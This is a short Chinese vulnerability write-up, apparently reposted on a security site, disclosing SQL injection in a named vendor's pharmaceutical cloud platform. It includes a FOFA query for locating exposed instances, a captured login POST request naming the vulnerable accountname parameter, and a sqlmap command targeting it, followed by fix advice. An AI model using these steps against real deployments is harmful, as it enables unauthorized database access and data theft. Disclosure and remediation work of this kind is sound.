成都海翔软件有限公司海翔药业云平台存在sql注入

admin 2024年2月23日20:47:13评论20 views字数 860阅读2分52秒阅读模式
 

成都海翔软件有限公司海翔药业云平台存在sql注入
0x00免责声明
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
成都海翔软件有限公司海翔药业云平台存在sql注入
0x01漏洞描述
    成都海翔软件有限公司海翔药业云平台存在sql注入,攻击者可利用此漏洞查询数据、获取系统信息,造成数据及其它安全风险。

成都海翔软件有限公司海翔药业云平台存在sql注入
0x02漏洞复现
1、fofa

title=="登录海翔"

2、部分界面如下

成都海翔软件有限公司海翔药业云平台存在sql注入

3、搜索账套,随便输入值,BP抓包如下

成都海翔软件有限公司海翔药业云平台存在sql注入

POST /getylist_login.do HTTP/1.1Host: 127.0.0.1Content-Length: 14Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://127.0.0.1Referer: http://127.0.0.1/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=FAE14B13415BA359B95FE239A9272270; __session:0.4635490933257511:=http:Connection: closeaccountname=1

成都海翔软件有限公司海翔药业云平台存在sql注入

4、输入单引号报错

成都海翔软件有限公司海翔药业云平台存在sql注入

5、sqlmap验证,隐患参数accountname

python3 sqlmap.py -r 2.txt -p accountname --dbms=mysql --level 3 --thread 5

成都海翔软件有限公司海翔药业云平台存在sql注入

成都海翔软件有限公司海翔药业云平台存在sql注入
0x03修复建议
1、升级到安全版本2、采用sql语句预编译和绑定变量。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月23日20:47:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   成都海翔软件有限公司海翔药业云平台存在sql注入https://cn-sec.com/archives/2114792.html

发表评论

匿名网友 填写信息